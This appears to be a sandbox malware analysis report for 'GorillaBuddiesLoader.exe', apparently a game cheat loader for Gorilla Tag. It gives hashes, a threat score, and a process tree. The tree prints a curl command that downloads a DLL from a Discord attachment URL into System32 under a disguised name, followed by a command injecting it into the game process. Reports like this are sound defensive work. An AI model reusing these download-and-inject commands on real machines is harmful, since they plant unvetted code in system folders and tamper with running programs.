6ae4b60a934317c8414e021c9bf7b8fd8f028269faa33d6b528d3f82f4c53124

Analysis

max time kernel
62s
max time network
125s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
19/12/2022, 23:15

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

GorillaBuddiesLoader.exe
Size

710KB
MD5

00b06e5acba23a40d1cc2df738ebcc25
SHA1

775223ce7b125270738c9af7abe0a2e7fd4cd1ad
SHA256

6ae4b60a934317c8414e021c9bf7b8fd8f028269faa33d6b528d3f82f4c53124
SHA512

d3d13e0c33e85fb48a93c358a8921100932ace0e72b600ddb14f633519553a2bb75d160c7a275355da00a76cf776fb657d4792dfb938bcc3f775c8af6860dc3b
SSDEEP

12288:+/ZRRUqe3Kbrylm9y3kkJES+KBazrhoFoR:guDKbrum4/ES7krbR

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\UnityEngine.EngineRefiner.dll	curl.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
868	4956	WerFault.exe	76

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 4956 wrote to memory of 2536	4956	GorillaBuddiesLoader.exe	78
PID 4956 wrote to memory of 2536	4956	GorillaBuddiesLoader.exe	78
PID 2536 wrote to memory of 1768	2536	cmd.exe	79
PID 2536 wrote to memory of 1768	2536	cmd.exe	79
PID 2536 wrote to memory of 4448	2536	cmd.exe	80
PID 2536 wrote to memory of 4448	2536	cmd.exe	80
PID 2536 wrote to memory of 3360	2536	cmd.exe	81
PID 2536 wrote to memory of 3360	2536	cmd.exe	81
PID 4956 wrote to memory of 4004	4956	GorillaBuddiesLoader.exe	84
PID 4956 wrote to memory of 4004	4956	GorillaBuddiesLoader.exe	84
PID 4956 wrote to memory of 1792	4956	GorillaBuddiesLoader.exe	93
PID 4956 wrote to memory of 1792	4956	GorillaBuddiesLoader.exe	93
PID 4956 wrote to memory of 372	4956	GorillaBuddiesLoader.exe	94
PID 4956 wrote to memory of 372	4956	GorillaBuddiesLoader.exe	94
PID 372 wrote to memory of 2652	372	cmd.exe	95
PID 372 wrote to memory of 2652	372	cmd.exe	95
PID 4956 wrote to memory of 204	4956	GorillaBuddiesLoader.exe	96
PID 4956 wrote to memory of 204	4956	GorillaBuddiesLoader.exe	96
PID 4956 wrote to memory of 1116	4956	GorillaBuddiesLoader.exe	97
PID 4956 wrote to memory of 1116	4956	GorillaBuddiesLoader.exe	97
PID 4956 wrote to memory of 924	4956	GorillaBuddiesLoader.exe	98
PID 4956 wrote to memory of 924	4956	GorillaBuddiesLoader.exe	98

C:\Users\Admin\AppData\Local\Temp\GorillaBuddiesLoader.exe
"C:\Users\Admin\AppData\Local\Temp\GorillaBuddiesLoader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GorillaBuddiesLoader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2536
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\GorillaBuddiesLoader.exe" MD5
    3⤵
    PID:1768
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:4448
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Color 09
  2⤵
  PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c (curl -s https://cdn.discordapp.com/attachments/1028042824211509309/1054531958832644168/Gorilla_Buddies_V2_Real_1.dll -o C:\Windows\System32\UnityEngine.EngineRefiner.dll)
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Windows\system32\curl.exe
    curl -s https://cdn.discordapp.com/attachments/1028042824211509309/1054531958832644168/Gorilla_Buddies_V2_Real_1.dll -o C:\Windows\System32\UnityEngine.EngineRefiner.dll
    3⤵
    - Drops file in System32 directory
    PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd C:\Users\Admin\AppData\Local\Temp & smi.exe inject -p "Gorilla Tag" -a C:\Windows\System32\UnityEngine.EngineRefiner.dll -n Menu.Loader -c Loader -m Load
  2⤵
  PID:204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cd C:\Users\Admin\AppData\Local\Temp & CFW.exe -f "C:\Windows\System32\UnityEngine.EngineRefiner.dll" > nul
  2⤵
  PID:1116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause
  2⤵
  PID:924
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4956 -s 3892
  2⤵
  - Program crash
  PID:868

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 4956 -ip 4956
1⤵
PID:548

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\UnityEngine.EngineRefiner.dll

Filesize
83KB

MD5
598cd5877316abf84e73c6190ecbe60c

SHA1
47a24f03cb4057bdae1c5f2f69aa67a6561b22f2

SHA256
4ff0100dcdd5c4c74d75cd4246d5929fdad003eac7dec21ae317e76f1e0e82e8

SHA512
e334d7a891a26d5557953eee878caf9d319eb74d61ef8b77bba700f7ec1ee4009c01842d65ecce3a7e9eac727c62d532154ed48baf9ec3dd4df3878802e975e1

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads